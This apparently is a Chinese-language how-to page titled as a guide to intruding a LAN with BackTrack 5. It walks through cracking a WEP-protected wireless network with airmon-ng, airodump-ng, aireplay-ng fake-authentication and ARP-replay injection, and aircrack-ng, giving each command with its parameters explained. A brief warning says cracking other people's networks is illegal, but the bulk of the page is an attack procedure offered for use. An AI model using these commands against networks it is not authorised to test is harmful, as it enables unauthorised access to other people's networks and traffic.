backtrack5怎么入侵局域网
Backtrack一直都被当作WEP密码破解的首选系统, BackTrack 5和之前的BackTrack 3和BackTrack 4一样集成了破解无线密码的工具并且支持更多型号的网卡. 3分钟破解一个用WEP加密方式的无线网络用BackTrack 5是完全可能的.下面是小编给大家整理的一些有关backtrack5入侵局域网教程,希望对大家有帮助!
backtrack5入侵局域网教程
非法破解他人的无线网络等同犯罪, 请以自己的无线网络作为实验环境.
首先, 需要准备:
1.BackTrack 5 光盘版或者虚拟机镜像, 也可以是Backtrack5 U盘版
2.一个兼容Backtrack的无线网卡
3.使用WEP加密的无线网络加入点(指的就是你要破解的无线网络)
点击进入Backtrack5系统下载
需要的全部指令:
(请根据实际情况替换粗体部分)
1) ifconfig -a
(可以查看到自己机子无线网卡的MAC地址和无线网卡的设备名称), 保留这个窗口方便下几步查看需要的信息, 打开新命令窗口进入一步)
2) airmon-ng start wlan0 2
(wlan0为无线网卡, 2为需要监听的频道, 根据自己情况输入, 此步骤为打开无线网卡的监听模式)
3) airodump-ng –ivs -w name -c 2 wlan0
(获取频道2的所有无线AP的信息, wlan0是无线网卡, 2为频道, 这一步的频道需要跟上一步的一致, 命令输入后会显示周围所有频道为*的无线AP,
显示的列表:
BSSID : 无线AP的Mac 地址
PWR: AP信号的大小
RXQ: 干扰值
Beacons:发送和接受的数据包, 有数据传输的时候就会跳动
#Data: 数据, 破解需要的最关键的就是这个
CH:频道
MB:网络连接速度
ESSID: AP的名称
保留这一窗口, 打开新的命令窗口进入下一步)
4) aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX wlan0
(发送欺骗, ap_essid为AP的名称, 例如Linksys或者TP-Link, ap_mac为AP的MAC地址, 第三步的BSSID就是AP的MAC地址, XXXXXXXXX为自己无线网卡的MAC地址, 第一步可以看到. 这一步成功后会显示Successful, 如不成功需要在信号强的地方重试, 成功后才可以进入下一步)
5) aireplay-ng -3 -b ap_mac -h XXXXXXXXXX -x 1024 wlan0
(ap_mac为无线AP的mac地址, 具体看步骤3, XXXXXXXX为无线网卡的mac地址, wlan0为网卡, 这一步执行以后, 开始正确的收发数据包, #Data开始上涨)
6) aircrack-ng -n 64 -b ap_mac name-*.ivs
(开始破解, ap_mac为ap的mac地址, 64指的是使用了64位加密, 多次破解失败的话可以试128)
多数情况下当#data开始迅速跳动的时候就可以开始破解了, 不需要等到多少包, 如果#data这个数据增长缓慢的话, 换个位置到无线信号强的地方再试, 命令输入正确的话最快3分钟搞定一个64位加密的WEP AP是没问题的! e网软摘测试时用的USB网卡, 如果使用内置无线网卡性能上会提升很多.